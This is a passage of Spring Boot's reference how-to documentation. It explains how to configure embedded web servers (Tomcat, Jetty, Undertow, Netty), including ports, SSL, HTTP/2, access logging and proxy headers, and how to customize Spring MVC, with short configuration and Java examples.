`@Value` annotations as well as the occasional use of\n`Binder`. For more about the exact ordering of loading properties, see\n\"<<spring-boot-features#boot-features-external-config>>\".\n\n\n\n[[howto-embedded-web-servers]]\n== Embedded Web Servers\n\nEach Spring Boot web application includes an embedded web server. This feature leads to a\nnumber of how-to questions, including how to change the embedded server and how to\nconfigure the embedded server. 
This section answers those questions.

[[howto-use-another-web-server]]
=== Use Another Web Server
Many Spring Boot starters include default embedded containers.

* For servlet stack applications, the `spring-boot-starter-web` includes Tomcat by including
`spring-boot-starter-tomcat`, but you can use `spring-boot-starter-jetty` or
`spring-boot-starter-undertow` instead.
* For reactive stack applications, the `spring-boot-starter-webflux` includes Reactor Netty
by including `spring-boot-starter-reactor-netty`, but you can use `spring-boot-starter-tomcat`,
`spring-boot-starter-jetty`, or `spring-boot-starter-undertow` instead.

When switching to a different HTTP server, you need to exclude the default dependencies
in addition to including the one you need. Spring Boot provides separate starters for
HTTP servers to help make this process as easy as possible.

The following Maven example shows how to exclude Tomcat and include Jetty for Spring MVC:

[source,xml,indent=0,subs="verbatim,quotes,attributes"]
----
	<properties>
		<servlet-api.version>3.1.0</servlet-api.version>
	</properties>
	<dependency>
		<groupId>org.springframework.boot</groupId>
		<artifactId>spring-boot-starter-web</artifactId>
		<exclusions>
			<!-- Exclude the Tomcat dependency -->
			<exclusion>
				<groupId>org.springframework.boot</groupId>
				<artifactId>spring-boot-starter-tomcat</artifactId>
			</exclusion>
		</exclusions>
	</dependency>
	<!-- Use Jetty instead -->
	<dependency>
		<groupId>org.springframework.boot</groupId>
		<artifactId>spring-boot-starter-jetty</artifactId>
	</dependency>
----

NOTE: The version of the Servlet API has been overridden as, unlike Tomcat 9 and Undertow
2.0, Jetty 9.4 does not support Servlet 4.0.

The following Gradle example shows how to exclude Netty and include Undertow for Spring
WebFlux:

[source,groovy,indent=0,subs="verbatim,quotes,attributes"]
----
	configurations {
		// exclude Reactor Netty
		compile.exclude module: 'spring-boot-starter-reactor-netty'
	}

	dependencies {
		compile 'org.springframework.boot:spring-boot-starter-webflux'
		// Use Undertow instead
		compile 'org.springframework.boot:spring-boot-starter-undertow'
		// ...
	}
----

NOTE: `spring-boot-starter-reactor-netty` is required to use the `WebClient` class, so
you may need to keep a dependency on Netty even when you include a different HTTP
server.



[[howto-disable-web-server]]
=== Disable the Web Server
If your classpath contains the necessary bits to start a web server, Spring Boot will
automatically start it. To disable this behavior, configure the `WebApplicationType` in
your `application.properties`, as shown in the following example:

[source,properties,indent=0]
----
	spring.main.web-application-type=none
----



[[howto-change-the-http-port]]
=== Change the HTTP Port
In a standalone application, the main HTTP port defaults to `8080` but can be set with
`server.port` (for example, in `application.properties` or as a System property). Thanks
to relaxed binding of `Environment` values, you can also use `SERVER_PORT` (for example,
as an OS environment variable).

To switch off the HTTP endpoints completely but still create a `WebApplicationContext`,
use `server.port=-1`.
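For example, in `application.properties`:

[source,properties,indent=0]
----
	server.port=-1
----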
(Doing so is sometimes useful for testing.)\n\nFor more details, see\n\"`<<spring-boot-features.adoc#boot-features-customizing-embedded-containers>>`\"\nin the '`Spring Boot features`' section, or the\n{sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[`ServerProperties`] source\ncode.\n\n\n\n[[howto-user-a-random-unassigned-http-port]]\n=== Use a Random Unassigned HTTP Port\nTo scan for a free port (using OS natives to prevent clashes) use `server.port=0`.\n\n\n\n[[howto-discover-the-http-port-at-runtime]]\n=== Discover the HTTP Port at Runtime\nYou can access the port the server is running on from log output or from the\n`ServletWebServerApplicationContext` through its `WebServer`. The best way to get that and\nbe sure that it has been initialized is to add a `@Bean` of type\n`ApplicationListener<ServletWebServerInitializedEvent>` and pull the container\nout of the event when it is published.\n\nTests that use `@SpringBootTest(webEnvironment=WebEnvironment.RANDOM_PORT)` can\nalso inject the actual port into a field by using the `@LocalServerPort` annotation, as\nshown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@RunWith(SpringJUnit4ClassRunner.class)\n\t@SpringBootTest(webEnvironment=WebEnvironment.RANDOM_PORT)\n\tpublic class MyWebIntegrationTests {\n\n\t\t@Autowired\n\t\tServletWebServerApplicationContext server;\n\n\t\t@LocalServerPort\n\t\tint port;\n\n\t\t\/\/ ...\n\n\t}\n----\n\n[NOTE]\n====\n`@LocalServerPort` is a meta-annotation for `@Value(\"${local.server.port}\")`. Do not try\nto inject the port in a regular application. As we just saw, the value is set only after\nthe container has been initialized. Contrary to a test, application code callbacks are\nprocessed early (before the value is actually available).\n====\n\n\n\n[[how-to-enable-http-response-compression]]\n=== Enable HTTP Response Compression\nHTTP response compression is supported by Jetty, Tomcat, and Undertow. It can be enabled\nin `application.properties`, as follows:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.compression.enabled=true\n----\n\nBy default, responses must be at least 2048 bytes in length for compression to be\nperformed. You can configure this behavior by setting the\n`server.compression.min-response-size` property.\n\nBy default, responses are compressed only if their content type is one of the\nfollowing:\n\n* `text\/html`\n* `text\/xml`\n* `text\/plain`\n* `text\/css`\n* `text\/javascript`\n* `application\/javascript`\n* `application\/json`\n* `application\/xml`\n\nYou can configure this behavior by setting the `server.compression.mime-types` property.\n\n\n\n[[howto-configure-ssl]]\n=== Configure SSL\nSSL can be configured declaratively by setting the various `+server.ssl.*+` properties,\ntypically in `application.properties` or `application.yml`. The following example shows\nsetting SSL properties in `application.properties`:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.port=8443\n\tserver.ssl.key-store=classpath:keystore.jks\n\tserver.ssl.key-store-password=secret\n\tserver.ssl.key-password=another-secret\n----\n\nSee {sc-spring-boot}\/web\/server\/Ssl.{sc-ext}[`Ssl`] for details of all of the\nsupported properties.\n\nUsing configuration such as the preceding example means the application no longer supports\na plain HTTP connector at port 8080. 
Spring Boot does not support the configuration of
both an HTTP connector and an HTTPS connector through `application.properties`. If you
want to have both, you need to configure one of them programmatically. We recommend using
`application.properties` to configure HTTPS, as the HTTP connector is the easier of the
two to configure programmatically. See the
{github-code}/spring-boot-samples/spring-boot-sample-tomcat-multi-connectors[`spring-boot-sample-tomcat-multi-connectors`]
sample project for an example.



[[howto-configure-http2]]
=== Configure HTTP/2
You can enable HTTP/2 support in your Spring Boot application with the
`+server.http2.enabled+` configuration property. This support depends on the chosen web
server and the application environment, since that protocol is not supported
out-of-the-box by JDK 8.

[NOTE]
====
Spring Boot does not support `h2c`, the cleartext version of the HTTP/2 protocol. So you
must <<howto-configure-ssl, configure SSL first>>.
====



[[howto-configure-http2-undertow]]
==== HTTP/2 with Undertow
As of Undertow 1.4.0+, HTTP/2 is supported without any additional requirement on JDK 8.



[[howto-configure-http2-jetty]]
==== HTTP/2 with Jetty
As of Jetty 9.4.8, HTTP/2 is also supported with the
https://www.conscrypt.org/[Conscrypt library].
To enable that support, your application needs to have two additional dependencies:
`org.eclipse.jetty:jetty-alpn-conscrypt-server` and `org.eclipse.jetty.http2:http2-server`.



[[howto-configure-http2-tomcat]]
==== HTTP/2 with Tomcat
Spring Boot ships by default with Tomcat 9.0.x, which supports HTTP/2 out of the box when
using JDK 9 or later. Alternatively, HTTP/2 can be used on JDK 8 if the `libtcnative`
library and its dependencies are installed on the host operating system.

The library folder must be made available, if not already, to the JVM library path. You
can do so with a JVM argument such as
`-Djava.library.path=/usr/local/opt/tomcat-native/lib`. For more details, see the
https://tomcat.apache.org/tomcat-9.0-doc/apr.html[official Tomcat documentation].

Starting Tomcat 9.0.x on JDK 8 without that native support logs the following error:

[indent=0,subs="attributes"]
----
	ERROR 8787 --- [ main] o.a.coyote.http11.Http11NioProtocol : The upgrade handler [org.apache.coyote.http2.Http2Protocol] for [h2] only supports upgrade via ALPN but has been configured for the ["https-jsse-nio-8443"] connector that does not support ALPN.
----

This error is not fatal, and the application still starts with HTTP/1.1 SSL support.



[[howto-configure-http2-netty]]
==== HTTP/2 with Reactor Netty
The `spring-boot-starter-webflux` starter uses Reactor Netty as its default server.
Reactor Netty can be configured for HTTP/2 using the JDK support with JDK 9 or later.
For JDK 8 environments, or for optimal runtime performance, this server also supports
HTTP/2 with native libraries. To enable that, your application needs to have an
additional dependency.

Spring Boot manages the version for the
`io.netty:netty-tcnative-boringssl-static` "uber jar", containing native libraries for
all platforms.
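With Maven, a sketch of that dependency declaration looks as follows (no version element
is needed, since Spring Boot manages the version):

[source,xml,indent=0,subs="verbatim,quotes,attributes"]
----
	<dependency>
		<groupId>io.netty</groupId>
		<artifactId>netty-tcnative-boringssl-static</artifactId>
	</dependency>
----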
Developers can choose to import only the required dependencies using
a classifier (see http://netty.io/wiki/forked-tomcat-native.html[the Netty official
documentation]).



[[howto-configure-webserver]]
=== Configure the Web Server

Generally, you should first consider using one of the many available configuration keys
and customize your web server by adding new entries in your `application.properties` (or
`application.yml`, or the environment; see
"`<<howto-discover-build-in-options-for-external-properties>>`"). The `server.{asterisk}`
namespace is quite useful here, and it includes namespaces like `server.tomcat.{asterisk}`,
`server.jetty.{asterisk}`, and others, for server-specific features.
See the list of <<common-application-properties>>.

The previous sections already covered many common use cases, such as compression, SSL,
or HTTP/2. However, if a configuration key doesn't exist for your use case, you should
then look at
{dc-spring-boot}/web/server/WebServerFactoryCustomizer.html[`WebServerFactoryCustomizer`].
You can declare such a component and get access to the server factory relevant to your
choice: you should select the variant for the chosen server (Tomcat, Jetty, Reactor Netty,
Undertow) and the chosen web stack (Servlet or Reactive).

The example below is for Tomcat with the `spring-boot-starter-web` (Servlet stack):

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
	@Component
	public class MyTomcatWebServerCustomizer
			implements WebServerFactoryCustomizer<TomcatServletWebServerFactory> {

		@Override
		public void customize(TomcatServletWebServerFactory factory) {
			// customize the factory here
		}
	}
----

In addition, Spring Boot provides:

[[howto-configure-webserver-customizers]]
[cols="1,2,2", options="header"]
|===
| Server | Servlet stack | Reactive stack

| Tomcat
| `TomcatServletWebServerFactory`
| `TomcatReactiveWebServerFactory`

| Jetty
| `JettyServletWebServerFactory`
| `JettyReactiveWebServerFactory`

| Undertow
| `UndertowServletWebServerFactory`
| `UndertowReactiveWebServerFactory`

| Reactor
| N/A
| `NettyReactiveWebServerFactory`

|===

Once you've got access to a `WebServerFactory`, you can often add customizers to it to
configure specific parts, like connectors, server resources, or the server itself -- all
using server-specific APIs.

As a last resort, you can also declare your own `WebServerFactory` component, which will
override the one provided by Spring Boot. In this case, you can't rely on configuration
properties in the `server` namespace anymore.



[[howto-add-a-servlet-filter-or-listener]]
=== Add a Servlet, Filter, or Listener to an Application
In a servlet stack application, that is, with `spring-boot-starter-web`, there are two
ways to add `Servlet`, `Filter`, `ServletContextListener`, and the other listeners
supported by the Servlet API to your application:

* <<howto-add-a-servlet-filter-or-listener-as-spring-bean>>
* <<howto-add-a-servlet-filter-or-listener-using-scanning>>



[[howto-add-a-servlet-filter-or-listener-as-spring-bean]]
==== Add a Servlet, Filter, or Listener by Using a Spring Bean
To add a `Servlet`, `Filter`, or Servlet `*Listener` by using a Spring bean, you must
provide a `@Bean` definition for it. Doing so can be very useful when you want to inject
configuration or dependencies.
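For example, the following sketch uses a `ServletRegistrationBean` (described below) to
register a hypothetical `MyServlet` with a mapping:

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
	@Bean
	public ServletRegistrationBean<MyServlet> myServlet() {
		// register the (hypothetical) MyServlet under /my-path/*
		return new ServletRegistrationBean<>(new MyServlet(), "/my-path/*");
	}
----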
However, you must be very careful that they do not cause\neager initialization of too many other beans, because they have to be installed in the\ncontainer very early in the application lifecycle. (For example, it is not a good idea to\nhave them depend on your `DataSource` or JPA configuration.) You can work around such\nrestrictions by initializing the beans lazily when first used instead of on\ninitialization.\n\nIn the case of `Filters` and `Servlets`, you can also add mappings and init parameters by\nadding a `FilterRegistrationBean` or a `ServletRegistrationBean` instead of or in\naddition to the underlying component.\n\n[NOTE]\n====\nIf no `dispatcherType` is specified on a filter registration, `REQUEST` is used. This\naligns with the Servlet Specification's default dispatcher type.\n====\n\nLike any other Spring bean, you can define the order of Servlet filter beans; please\nmake sure to check the\n\"`<<spring-boot-features.adoc#boot-features-embedded-container-servlets-filters-listeners-beans>>`\"\nsection.\n\n\n\n[[howto-disable-registration-of-a-servlet-or-filter]]\n===== Disable Registration of a Servlet or Filter\nAs <<howto-add-a-servlet-filter-or-listener-as-spring-bean,described earlier>>, any\n`Servlet` or `Filter` beans are registered with the servlet container automatically. To\ndisable registration of a particular `Filter` or `Servlet` bean, create a registration\nbean for it and mark it as disabled, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic FilterRegistrationBean registration(MyFilter filter) {\n\t\tFilterRegistrationBean registration = new FilterRegistrationBean(filter);\n\t\tregistration.setEnabled(false);\n\t\treturn registration;\n\t}\n----\n\n\n\n[[howto-add-a-servlet-filter-or-listener-using-scanning]]\n==== Add Servlets, Filters, and Listeners by Using Classpath Scanning\n`@WebServlet`, `@WebFilter`, and `@WebListener` annotated classes can be automatically\nregistered with an embedded servlet container by annotating a `@Configuration` class\nwith `@ServletComponentScan` and specifying the package(s) containing the components\nthat you want to register. By default, `@ServletComponentScan` scans from the package\nof the annotated class.\n\n\n\n[[howto-configure-accesslogs]]\n=== Configure Access Logging\nAccess logs can be configured for Tomcat, Undertow, and Jetty through their respective\nnamespaces.\n\nFor instance, the following settings log access on Tomcat with a\n{tomcat-documentation}\/config\/valve.html#Access_Logging[custom pattern].\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.tomcat.basedir=my-tomcat\n\tserver.tomcat.accesslog.enabled=true\n\tserver.tomcat.accesslog.pattern=%t %a \"%r\" %s (%D ms)\n----\n\nNOTE: The default location for logs is a `logs` directory relative to the Tomcat base\ndirectory. By default, the `logs` directory is a temporary directory, so you may want to\nfix Tomcat's base directory or use an absolute path for the logs. 
In the preceding\nexample, the logs are available in `my-tomcat\/logs` relative to the working directory of\nthe application.\n\nAccess logging for Undertow can be configured in a similar fashion, as shown in the\nfollowing example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.undertow.accesslog.enabled=true\n\tserver.undertow.accesslog.pattern=%t %a \"%r\" %s (%D ms)\n----\n\nLogs are stored in a `logs` directory relative to the working directory of the\napplication. You can customize this location by setting the\n`server.undertow.accesslog.directory` property.\n\nFinally, access logging for Jetty can also be configured as follows:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.jetty.accesslog.enabled=true\n\tserver.jetty.accesslog.filename=\/var\/log\/jetty-access.log\n----\n\nBy default, logs are redirected to `System.err`. For more details, see\n{jetty-documentation}\/configuring-jetty-request-logs.html[the Jetty documentation].\n\n\n\n[[howto-use-behind-a-proxy-server]]\n[[howto-use-tomcat-behind-a-proxy-server]]\n=== Running Behind a Front-end Proxy Server\nYour application might need to send `302` redirects or render content with absolute links\nback to itself. When running behind a proxy, the caller wants a link to the proxy and not\nto the physical address of the machine hosting your app. Typically, such situations are\nhandled through a contract with the proxy, which adds headers to tell the back end how to\nconstruct links to itself.\n\nIf the proxy adds conventional `X-Forwarded-For` and `X-Forwarded-Proto` headers (most\nproxy servers do so), the absolute links should be rendered correctly, provided\n`server.use-forward-headers` is set to `true` in your `application.properties`.\n\nNOTE: If your application runs in Cloud Foundry or Heroku, the\n`server.use-forward-headers` property defaults to `true`. In all\nother instances, it defaults to `false`.\n\n\n\n[[howto-customize-tomcat-behind-a-proxy-server]]\n==== Customize Tomcat's Proxy Configuration\nIf you use Tomcat, you can additionally configure the names of the headers used to\ncarry \"`forwarded`\" information, as shown in the following example:\n\n[indent=0]\n----\n\tserver.tomcat.remote-ip-header=x-your-remote-ip-header\n\tserver.tomcat.protocol-header=x-your-protocol-header\n----\n\nTomcat is also configured with a default regular expression that matches internal\nproxies that are to be trusted. By default, IP addresses in `10\/8`, `192.168\/16`,\n`169.254\/16` and `127\/8` are trusted. You can customize the valve's configuration by\nadding an entry to `application.properties`, as shown in the following example:\n\n[indent=0]\n----\n\tserver.tomcat.internal-proxies=192\\\\.168\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\n----\n\nNOTE: The double backslashes are required only when you use a properties file for\nconfiguration. 
If you use YAML, single backslashes are sufficient, and a value\nequivalent to that shown in the preceding example would be `192\\.168\\.\\d{1,3}\\.\\d{1,3}`.\n\nNOTE: You can trust all proxies by setting the `internal-proxies` to empty (but do not do\nso in production).\n\nYou can take complete control of the configuration of Tomcat's `RemoteIpValve` by\nswitching the automatic one off (to do so, set `server.use-forward-headers=false`) and\nadding a new valve instance in a `TomcatServletWebServerFactory` bean.\n\n\n\n[[howto-enable-multiple-connectors-in-tomcat]]\n=== Enable Multiple Connectors with Tomcat\nYou can add an `org.apache.catalina.connector.Connector` to the\n`TomcatServletWebServerFactory`, which can allow multiple connectors, including HTTP and\nHTTPS connectors, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\tpublic ServletWebServerFactory servletContainer() {\n\t\tTomcatServletWebServerFactory tomcat = new TomcatServletWebServerFactory();\n\t\ttomcat.addAdditionalTomcatConnectors(createSslConnector());\n\t\treturn tomcat;\n\t}\n\n\tprivate Connector createSslConnector() {\n\t\tConnector connector = new Connector(\"org.apache.coyote.http11.Http11NioProtocol\");\n\t\tHttp11NioProtocol protocol = (Http11NioProtocol) connector.getProtocolHandler();\n\t\ttry {\n\t\t\tFile keystore = new ClassPathResource(\"keystore\").getFile();\n\t\t\tFile truststore = new ClassPathResource(\"keystore\").getFile();\n\t\t\tconnector.setScheme(\"https\");\n\t\t\tconnector.setSecure(true);\n\t\t\tconnector.setPort(8443);\n\t\t\tprotocol.setSSLEnabled(true);\n\t\t\tprotocol.setKeystoreFile(keystore.getAbsolutePath());\n\t\t\tprotocol.setKeystorePass(\"changeit\");\n\t\t\tprotocol.setTruststoreFile(truststore.getAbsolutePath());\n\t\t\tprotocol.setTruststorePass(\"changeit\");\n\t\t\tprotocol.setKeyAlias(\"apitester\");\n\t\t\treturn connector;\n\t\t}\n\t\tcatch (IOException ex) {\n\t\t\tthrow new IllegalStateException(\"can't access keystore: [\" + \"keystore\"\n\t\t\t\t\t+ \"] or truststore: [\" + \"keystore\" + \"]\", ex);\n\t\t}\n\t}\n----\n\n\n\n[[howto-use-tomcat-legacycookieprocessor]]\n=== Use Tomcat's LegacyCookieProcessor\nBy default, the embedded Tomcat used by Spring Boot does not support \"Version 0\" of the\nCookie format, so you may see the following error:\n\n[indent=0]\n----\n\tjava.lang.IllegalArgumentException: An invalid character [32] was present in the Cookie value\n----\n\nIf at all possible, you should consider updating your code to only store values\ncompliant with later Cookie specifications. If, however, you cannot change the\nway that cookies are written, you can instead configure Tomcat to use a\n`LegacyCookieProcessor`. 
To switch to the `LegacyCookieProcessor`, use a
`WebServerFactoryCustomizer` bean that adds a `TomcatContextCustomizer`, as shown
in the following example:

[source,java,indent=0]
----
include::{code-examples}/context/embedded/TomcatLegacyCookieProcessorExample.java[tag=customizer]
----



[[howto-enable-multiple-listeners-in-undertow]]
=== Enable Multiple Listeners with Undertow
Add an `UndertowBuilderCustomizer` to the `UndertowServletWebServerFactory` and
add a listener to the `Builder`, as shown in the following example:

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
	@Bean
	public UndertowServletWebServerFactory servletWebServerFactory() {
		UndertowServletWebServerFactory factory = new UndertowServletWebServerFactory();
		factory.addBuilderCustomizers(new UndertowBuilderCustomizer() {

			@Override
			public void customize(Builder builder) {
				builder.addHttpListener(8080, "0.0.0.0");
			}

		});
		return factory;
	}
----



[[howto-create-websocket-endpoints-using-serverendpoint]]
=== Create WebSocket Endpoints Using @ServerEndpoint
If you want to use `@ServerEndpoint` in a Spring Boot application that uses an embedded
container, you must declare a single `ServerEndpointExporter` `@Bean`, as shown in the
following example:

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
	@Bean
	public ServerEndpointExporter serverEndpointExporter() {
		return new ServerEndpointExporter();
	}
----

The bean shown in the preceding example registers any `@ServerEndpoint` annotated beans
with the underlying WebSocket container. When deployed to a standalone servlet container,
this role is performed by a servlet container initializer, and the
`ServerEndpointExporter` bean is not required.



[[howto-spring-mvc]]
== Spring MVC

Spring Boot has a number of starters that include Spring MVC. Note that some starters
declare a dependency on Spring MVC rather than including it directly. This section answers
common questions about Spring MVC and Spring Boot.

[[howto-write-a-json-rest-service]]
=== Write a JSON REST Service
Any Spring `@RestController` in a Spring Boot application should render JSON responses by
default as long as Jackson2 is on the classpath, as shown in the following example:

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
	@RestController
	public class MyController {

		@RequestMapping("/thing")
		public MyThing thing() {
			return new MyThing();
		}

	}
----

As long as `MyThing` can be serialized by Jackson2 (true for a normal POJO or Groovy
object), then `http://localhost:8080/thing` serves a JSON representation of it by
default. Note that, in a browser, you might sometimes see XML responses, because browsers
tend to send accept headers that prefer XML.
To use the Jackson XML renderer, add the following dependency to your project:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>com.fasterxml.jackson.dataformat<\/groupId>\n\t\t<artifactId>jackson-dataformat-xml<\/artifactId>\n\t<\/dependency>\n----\n\nIf Jackson's XML extension is not available, JAXB (provided by default in the JDK) is\nused, with the additional requirement of having `MyThing` annotated as\n`@XmlRootElement`, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@XmlRootElement\n\tpublic class MyThing {\n\t\tprivate String name;\n\t\t\/\/ .. getters and setters\n\t}\n----\n\nTo get the server to render XML instead of JSON, you might have to send an\n`Accept: text\/xml` header (or use a browser).\n\n\n\n[[howto-customize-the-jackson-objectmapper]]\n=== Customize the Jackson ObjectMapper\nSpring MVC (client and server side) uses `HttpMessageConverters` to negotiate content\nconversion in an HTTP exchange. If Jackson is on the classpath, you already get the\ndefault converter(s) provided by `Jackson2ObjectMapperBuilder`, an instance of which\nis auto-configured for you.\n\nThe `ObjectMapper` (or `XmlMapper` for Jackson XML converter) instance (created by\ndefault) has the following customized properties:\n\n* `MapperFeature.DEFAULT_VIEW_INCLUSION` is disabled\n* `DeserializationFeature.FAIL_ON_UNKNOWN_PROPERTIES` is disabled\n* `SerializationFeature.WRITE_DATES_AS_TIMESTAMPS` is disabled\n\nSpring Boot also has some features to make it easier to customize this behavior.\n\nYou can configure the `ObjectMapper` and `XmlMapper` instances by using the environment.\nJackson provides an extensive suite of simple on\/off features that can be used to\nconfigure various aspects of its processing. These features are described in six enums (in\nJackson) that map onto properties in the environment:\n\n|===\n|Enum|Property|Values\n\n|`com.fasterxml.jackson.databind.DeserializationFeature`\n|`spring.jackson.deserialization.<feature_name>`\n|`true`, `false`\n\n|`com.fasterxml.jackson.core.JsonGenerator.Feature`\n|`spring.jackson.generator.<feature_name>`\n|`true`, `false`\n\n|`com.fasterxml.jackson.databind.MapperFeature`\n|`spring.jackson.mapper.<feature_name>`\n|`true`, `false`\n\n|`com.fasterxml.jackson.core.JsonParser.Feature`\n|`spring.jackson.parser.<feature_name>`\n|`true`, `false`\n\n|`com.fasterxml.jackson.databind.SerializationFeature`\n|`spring.jackson.serialization.<feature_name>`\n|`true`, `false`\n\n|`com.fasterxml.jackson.annotation.JsonInclude.Include`\n|`spring.jackson.default-property-inclusion`\n|`always`, `non_null`, `non_absent`, `non_default`, `non_empty`\n|===\n\nFor example, to enable pretty print, set `spring.jackson.serialization.indent_output=true`.\nNote that, thanks to the use of <<boot-features-external-config-relaxed-binding,\nrelaxed binding>>, the case of `indent_output` does not have to match the case of the\ncorresponding enum constant, which is `INDENT_OUTPUT`.\n\nThis environment-based configuration is applied to the auto-configured\n`Jackson2ObjectMapperBuilder` bean and applies to any mappers created by\nusing the builder, including the auto-configured `ObjectMapper` bean.\n\nThe context's `Jackson2ObjectMapperBuilder` can be customized by one or more\n`Jackson2ObjectMapperBuilderCustomizer` beans. 
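For example, the following sketch tweaks the builder (the date format is illustrative):

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
	@Bean
	public Jackson2ObjectMapperBuilderCustomizer jacksonCustomizer() {
		// the lambda receives the auto-configured Jackson2ObjectMapperBuilder
		return builder -> builder.simpleDateFormat("yyyy-MM-dd");
	}
----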
Such customizer beans can be ordered\n(Boot's own customizer has an order of 0), letting additional customization be applied\nboth before and after Boot's customization.\n\nAny beans of type `com.fasterxml.jackson.databind.Module` are automatically registered\nwith the auto-configured `Jackson2ObjectMapperBuilder` and are applied to any `ObjectMapper`\ninstances that it creates. This provides a global mechanism for contributing custom\nmodules when you add new features to your application.\n\nIf you want to replace the default `ObjectMapper` completely, either define a `@Bean` of\nthat type and mark it as `@Primary` or, if you prefer the builder-based\napproach, define a `Jackson2ObjectMapperBuilder` `@Bean`. Note that, in either case,\ndoing so disables all auto-configuration of the `ObjectMapper`.\n\nIf you provide any `@Beans` of type `MappingJackson2HttpMessageConverter`,\nthey replace the default value in the MVC configuration. Also, a convenience bean of type\n`HttpMessageConverters` is provided (and is always available if you use the default MVC\nconfiguration). It has some useful methods to access the default and user-enhanced\nmessage converters.\n\nSee the \"`<<howto-customize-the-responsebody-rendering>>`\" section and the\n{sc-spring-boot-autoconfigure}\/web\/servlet\/WebMvcAutoConfiguration.{sc-ext}[`WebMvcAutoConfiguration`]\nsource code for more details.\n\n\n\n[[howto-customize-the-responsebody-rendering]]\n=== Customize the @ResponseBody Rendering\nSpring uses `HttpMessageConverters` to render `@ResponseBody` (or responses from\n`@RestController`). You can contribute additional converters by adding beans of the\nappropriate type in a Spring Boot context. If a bean you add is of a type that would have\nbeen included by default anyway (such as `MappingJackson2HttpMessageConverter` for JSON\nconversions), it replaces the default value. A convenience bean of type\n`HttpMessageConverters` is provided and is always available if you use the default MVC\nconfiguration. It has some useful methods to access the default and user-enhanced message\nconverters (For example, it can be useful if you want to manually inject them into a\ncustom `RestTemplate`).\n\nAs in normal MVC usage, any `WebMvcConfigurer` beans that you provide can also\ncontribute converters by overriding the `configureMessageConverters` method. However, unlike\nwith normal MVC, you can supply only additional converters that you need (because Spring\nBoot uses the same mechanism to contribute its defaults). Finally, if you opt out of the\nSpring Boot default MVC configuration by providing your own `@EnableWebMvc` configuration,\nyou can take control completely and do everything manually by using\n`getMessageConverters` from `WebMvcConfigurationSupport`.\n\nSee the\n{sc-spring-boot-autoconfigure}\/web\/servlet\/WebMvcAutoConfiguration.{sc-ext}[`WebMvcAutoConfiguration`]\nsource code for more details.\n\n\n\n[[howto-multipart-file-upload-configuration]]\n=== Handling Multipart File Uploads\nSpring Boot embraces the Servlet 3 `javax.servlet.http.Part` API to support uploading\nfiles. By default, Spring Boot configures Spring MVC with a maximum size of 1MB per\nfile and a maximum of 10MB of file data in a single request. You may override these\nvalues, the location to which intermediate data is stored (for example, to the `\/tmp`\ndirectory), and the threshold past which data is flushed to disk by using the properties\nexposed in the `MultipartProperties` class. 
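The following sketch shows what such settings look like in `application.properties` (the
values are illustrative):

[source,properties,indent=0]
----
	spring.servlet.multipart.max-file-size=10MB
	spring.servlet.multipart.max-request-size=20MB
----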
For example, if you want to specify that\nfiles be unlimited, set the `spring.servlet.multipart.max-file-size` property to `-1`.\n\nThe multipart support is helpful when you want to receive multipart encoded file data as\na `@RequestParam`-annotated parameter of type `MultipartFile` in a Spring MVC controller\nhandler method.\n\nSee the\n{sc-spring-boot-autoconfigure}\/web\/servlet\/MultipartAutoConfiguration.{sc-ext}[`MultipartAutoConfiguration`]\nsource for more details.\n\nNOTE: It is recommended to use the container's built-in support for multipart uploads\nrather than introducing an additional dependency such as Apache Commons File Upload.\n\n\n\n[[howto-switch-off-the-spring-mvc-dispatcherservlet]]\n=== Switch Off the Spring MVC DispatcherServlet\nBy default, all content is served from the root of your application (`\/`). If you\nwould rather map to a different path, you can configure one as follows:\n\n[source,properties,indent=0,subs=\"verbatim\"]\n----\n\tspring.mvc.servlet.path=\/acme\n----\n\nIf you have additional servlets you can declare a `@Bean` of type `Servlet` or\n`ServletRegistrationBean` for each and Spring Boot will register them transparently to the\ncontainer. Because servlets are registered that way, they can be mapped to a sub-context\nof the `DispatcherServlet` without invoking it.\n\nConfiguring the `DispatcherServlet` yourself is unusual but if you really need to do it, a\n`@Bean` of type `DispatcherServletPath` must be provided as well to provide the path of\nyour custom `DispatcherServlet`.\n\n\n\n[[howto-switch-off-default-mvc-configuration]]\n=== Switch off the Default MVC Configuration\nThe easiest way to take complete control over MVC configuration is to provide your own\n`@Configuration` with the `@EnableWebMvc` annotation. Doing so leaves all MVC\nconfiguration in your hands.\n\n\n\n[[howto-customize-view-resolvers]]\n=== Customize ViewResolvers\nA `ViewResolver` is a core component of Spring MVC, translating view names in\n`@Controller` to actual `View` implementations. Note that `ViewResolvers` are mainly\nused in UI applications, rather than REST-style services (a `View` is not used to render\na `@ResponseBody`). There are many implementations of `ViewResolver` to choose from, and\nSpring on its own is not opinionated about which ones you should use. Spring Boot, on the\nother hand, installs one or two for you, depending on what it finds on the classpath and\nin the application context. The `DispatcherServlet` uses all the resolvers it finds in\nthe application context, trying each one in turn until it gets a result, so, if you\nadd your own, you have to be aware of the order and in which position your resolver is\nadded.\n\n`WebMvcAutoConfiguration` adds the following `ViewResolvers` to your context:\n\n* An `InternalResourceViewResolver` named '`defaultViewResolver`'. This one locates\nphysical resources that can be rendered by using the `DefaultServlet` (including static\nresources and JSP pages, if you use those). It applies a prefix and a suffix to the\nview name and then looks for a physical resource with that path in the servlet context\n(the defaults are both empty but are accessible for external configuration through\n`spring.mvc.view.prefix` and `spring.mvc.view.suffix`). You can override it 